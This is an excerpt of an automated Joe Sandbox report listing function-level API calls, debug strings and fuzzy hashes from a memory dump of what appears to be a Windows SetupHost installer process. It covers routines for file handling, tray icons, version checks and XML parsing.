                                                                                                                                                                                                                • Opcode Fuzzy Hash: c028a505ab5214114052b43d2167df5c6c15fb855aa3c8e047d39347c68a1f35
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8111C2B2A00604BBCB15DB99DC45FAFBBB9EBC5B10F00852DF502876D0DA75A902C760
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009EC44C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009EC467
                                                                                                                                                                                                                  • Part of subcall function 009EC44C: GetLastError.KERNEL32(?,000000FF,00000000,00000000), ref: 009EC471
                                                                                                                                                                                                                  • Part of subcall function 009EC44C: SetLastError.KERNEL32(00000000,?,000000FF,00000000,00000000), ref: 009EC4D8
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EC5CB
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,?,00000001,00000000,?,00000080,00000000), ref: 009EC612
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EC61F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009EC62A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EC631
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009EC638
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$ByteCharCreateFileFreeMultiProcessWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1980470959-0
                                                                                                                                                                                                                • Opcode ID: 829254378382fd73d8fec45ee8e05c359827422ae8cefe30f40eab0395c4f86c
                                                                                                                                                                                                                • Instruction ID: cdbe63330bfaa51230f78e3f5e3aa111d562990a5cd8c9ae43bd59e70e0c0675
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 829254378382fd73d8fec45ee8e05c359827422ae8cefe30f40eab0395c4f86c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD0124B62442406FE31457FA9C0EFFA376CE788776F044614FE22CB2D0DE649C028620
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,009C076D,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009BE33D
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009C076D,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009BE2F1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009BE305
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE321
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE328
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE32F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 686246089-0
                                                                                                                                                                                                                • Opcode ID: aeeb784524e395ca1eaab5f1d775210feadd24ad6635c3037b32579c03853884
                                                                                                                                                                                                                • Instruction ID: dfe16d8f16e6bb3e89dc205b56869633b21eb0a26f0048b56d3adec72ba6f701
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aeeb784524e395ca1eaab5f1d775210feadd24ad6635c3037b32579c03853884
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD0128336082115BEB3157FD6E4CBEF26ADABC4772F194620F855C7094CB648C838295
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,009DE584,?,00000000), ref: 009EB369
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00010000,00000007,00000000,00000003,06200000,00000000), ref: 009EB380
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009EB38C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,009DE584,?,00000000), ref: 009EB398
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,009DE584,?,00000000), ref: 009EB3A3
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,?,009DE584,?,00000000), ref: 009EB3AF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$File$AttributesCloseCreateHandle
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3033830061-0
                                                                                                                                                                                                                • Opcode ID: 4e8cfebbf07ad1118eedc1ba9e23f364a73a1c221cc0a0224667f7b5a3f020cc
                                                                                                                                                                                                                • Instruction ID: 6529e00f5a1c5aae13051c8324e39efe68a502ee9ec7f29dd80944eee54cf28b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e8cfebbf07ad1118eedc1ba9e23f364a73a1c221cc0a0224667f7b5a3f020cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73F0B43164A310A7D73257B6AC0EFAF6A3DAF85F71F256600F914E61D0CB60CC4396A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00A087D7,?,?), ref: 00A0A74F
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0A761
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,-00000001,?,?,00A087D7,?,?), ref: 00A0A774
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00A087D7,?,?), ref: 00A0A840
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0A852
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,-00000001,?,?,00A087D7,?,?), ref: 00A0A865
                                                                                                                                                                                                                • memmove.MSVCRT ref: 00A0A8E2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap$memset$memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1722795766-0
                                                                                                                                                                                                                • Opcode ID: 115ba39b95823f876aa417b53334191425bae1cdd4ac0c19cbedefcc078f1f78
                                                                                                                                                                                                                • Instruction ID: 9c8ba0e73dd09ad624354a0e47ba3d29c25750b2e29d895e66d574e576cf51a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 115ba39b95823f876aa417b53334191425bae1cdd4ac0c19cbedefcc078f1f78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D71E170B0030A9FCB24DF68E98485EB7F5EF14764710CA2DE466D3290E630DD898B06
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMicrodomBuilder::ConsumeAttdef, xrefs: 009D51DF
                                                                                                                                                                                                                • NewAttdef = this->AllocateStreamObject(), xrefs: 009D51D4
                                                                                                                                                                                                                • m_AttdefListTable.FindOrInsertIfNotPresent( ulElementName, NewAttdefList, &pAttdefList), xrefs: 009D537F
                                                                                                                                                                                                                • onecore\base\xml\udom_builder.cpp, xrefs: 009D51E6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __aullrem
                                                                                                                                                                                                                • String ID: CMicrodomBuilder::ConsumeAttdef$NewAttdef = this->AllocateStreamObject()$m_AttdefListTable.FindOrInsertIfNotPresent( ulElementName, NewAttdefList, &pAttdefList)$onecore\base\xml\udom_builder.cpp
                                                                                                                                                                                                                • API String ID: 3758378126-1433591952
                                                                                                                                                                                                                • Opcode ID: c40c3e0618e8a3170062dc6c030db0f618d16f7bbcea90ba3a01081507c2d0ac
                                                                                                                                                                                                                • Instruction ID: 1776ec1d7a2ff1e307860610f7446584d52eeb56a16fabc3275dbfc367947588
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c40c3e0618e8a3170062dc6c030db0f618d16f7bbcea90ba3a01081507c2d0ac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B07177B1940A0AEFDB14CF65C844AAABBF8FB44304F21C52BE6169B740D775E949CF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E494C
                                                                                                                                                                                                                  • Part of subcall function 009E43A1: GetLastError.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,?,?,?,?,00000000,00000000,00000000), ref: 009E4421
                                                                                                                                                                                                                  • Part of subcall function 009E43A1: SetLastError.KERNEL32(0000000D,00000000,00000001,00000000,?,?,?,?,00000000,00000000,00000000), ref: 009E444C
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000048,00000000,00000000,00000000,00000000), ref: 009E49D5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E49ED
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID: H$VerifyIntegrityChunk
                                                                                                                                                                                                                • API String ID: 1894359853-118424062
                                                                                                                                                                                                                • Opcode ID: 521e7bad59f34529a311114ad2ec5eea7aaec9268b5f5d0e269089e600944941
                                                                                                                                                                                                                • Instruction ID: 57c898735cbedcc4a42001fef121aaa99adbf62ed7468f2badf7ecd97f344774
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 521e7bad59f34529a311114ad2ec5eea7aaec9268b5f5d0e269089e600944941
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9515975E402599BCB21DFAAC880BAEBBF8AF48714F104439E905EB341D735AC01CB94
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CSystemHelper::ShowBalloon, xrefs: 009A873E
                                                                                                                                                                                                                • SetupUI: Modifying tray icon..., xrefs: 009A86E5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: CSystemHelper::ShowBalloon$SetupUI: Modifying tray icon...
                                                                                                                                                                                                                • API String ID: 2221118986-3738612624
                                                                                                                                                                                                                • Opcode ID: bab2772009fd183f7c8702b95fd7b43f9ca2cf0c0f11d84dfcf31414fca1fc1f
                                                                                                                                                                                                                • Instruction ID: f69c950386211b26cb07d7512e5857287abb75df0d0c854133ddfa2df6ad2581
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bab2772009fd183f7c8702b95fd7b43f9ca2cf0c0f11d84dfcf31414fca1fc1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD41F074B002149BDF11DF608849BAA7BA9EB85360F2544A9E905AB381DFB49E41CBC1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009BCA7D
                                                                                                                                                                                                                  • Part of subcall function 009B93B4: wcschr.MSVCRT ref: 009B941C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • OneSettings: Unexpected number of tokens in the build string: [%s], xrefs: 009BCAFA
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::BuildStringUpdateUBR, xrefs: 009BCAAF, 009BCB91
                                                                                                                                                                                                                • %s.%s.%s.%u.%s.%s.%s, xrefs: 009BCB73
                                                                                                                                                                                                                • OneSettings: Could not convert 4th token in the build string to a number: [0x%X] [%s], xrefs: 009BCB42
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3wcschr
                                                                                                                                                                                                                • String ID: %s.%s.%s.%u.%s.%s.%s$CMoSetupOneSettingsHelperT<class CEmptyType>::BuildStringUpdateUBR$OneSettings: Could not convert 4th token in the build string to a number: [0x%X] [%s]$OneSettings: Unexpected number of tokens in the build string: [%s]
                                                                                                                                                                                                                • API String ID: 4055027153-4235502543
                                                                                                                                                                                                                • Opcode ID: dab16c94b723bc1ed30a1e4d0f4042a15df3c336d38ce59ebbc6dab5c040e76d
                                                                                                                                                                                                                • Instruction ID: 314a00d574d7b2b624c722fa17f422fec7e2c37edf8b493a43bb45febde1e832
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dab16c94b723bc1ed30a1e4d0f4042a15df3c336d38ce59ebbc6dab5c040e76d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E41B0B1700219EBDF08DFA0CA52FEE7766BF88324F144429F919AB281DB75D911CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009A80AE
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009A8168
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009A8172
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CSystemHelper::CreateTrayIcon, xrefs: 009A8080
                                                                                                                                                                                                                • SetupUI: Creating tray icon..., xrefs: 009A8140
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorH_prolog3IconLastNotifyShell_memset
                                                                                                                                                                                                                • String ID: CSystemHelper::CreateTrayIcon$SetupUI: Creating tray icon...
                                                                                                                                                                                                                • API String ID: 1564345637-1340830530
                                                                                                                                                                                                                • Opcode ID: 82fd83f6da1ad9e26940e78ba020b7919098c822b3507d818ff7f52be280ed6b
                                                                                                                                                                                                                • Instruction ID: 9127e0630a72821c95db69eca82eeb3e8fb3ba389071772b67d53e59c3b6c497
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82fd83f6da1ad9e26940e78ba020b7919098c822b3507d818ff7f52be280ed6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4331D371B002149BDF15DFA4CC59B9E77B9AF85314F0444A9E905EB381DB749E46CF80
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: CSystemHelper::SetMainTitle$SetupUI: Setting main title: [%s]
                                                                                                                                                                                                                • API String ID: 431132790-2238234619
                                                                                                                                                                                                                • Opcode ID: 141b90da451c06fb7cae3068013627ef39fd25a7a734492fa63c1197934df3f0
                                                                                                                                                                                                                • Instruction ID: 21abac9d1370b9cc773c5fec14809c2874ec24c9b2c49e07cd1c1f42c93d82c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 141b90da451c06fb7cae3068013627ef39fd25a7a734492fa63c1197934df3f0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC318075B002118BCF04EFB489596BEB6B6AFC4B10B148469E812EB385DE74DD02CBD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009A8213
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 009A827C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 009A8286
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorIconLastNotifyShell_memset
                                                                                                                                                                                                                • String ID: CSystemHelper::RemoveTrayIcon$SetupUI: Removing tray icon...
                                                                                                                                                                                                                • API String ID: 501942869-4207634123
                                                                                                                                                                                                                • Opcode ID: 2cb13b7a5b9734afe59fe74b91f2a7f2eb7541823093117c23ee53a9095c06f6
                                                                                                                                                                                                                • Instruction ID: bec8af16c1173551b349cb4cf1548748752bbccbc64237694e099c6ee8276ccd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cb13b7a5b9734afe59fe74b91f2a7f2eb7541823093117c23ee53a9095c06f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD318475B006149BDB15EFA48C49ABEB7BDAFC9714F04446EE905E7380DF709E028B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00A0D306
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0D34E
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 00A0D367
                                                                                                                                                                                                                  • Part of subcall function 009B9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,009A7B5C), ref: 009B9CD7
                                                                                                                                                                                                                  • Part of subcall function 009B9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,009A7B5C), ref: 009B9CE1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorH_prolog3_HandleLastModuleVersionmemset
                                                                                                                                                                                                                • String ID: %d.%d$%d.%d.%d.%d
                                                                                                                                                                                                                • API String ID: 1866922265-3157913242
                                                                                                                                                                                                                • Opcode ID: a2d5d71b8de039e868afcb0ed74ce5c743d53f5055f48b59ee7a6d421a6b17e3
                                                                                                                                                                                                                • Instruction ID: f1091eb2b0242091021d7cf9ec168d882368a94b51150f8485ff61be24612fbc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2d5d71b8de039e868afcb0ed74ce5c743d53f5055f48b59ee7a6d421a6b17e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6316671E0122D9BDF24AFA5DD817EDB2B5AF88314F4040E9E509AB281DB75AF80CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: RtlNtStatusToDosError.NTDLL ref: 009E14EF
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: RtlNtStatusToDosError.NTDLL ref: 009E14FD
                                                                                                                                                                                                                  • Part of subcall function 009E13ED: SetLastError.KERNEL32(00000000), ref: 009E1519
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 009E99EA
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E9A00
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E9A39
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E9A47
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Status$Last
                                                                                                                                                                                                                • String ID: ReadChunk
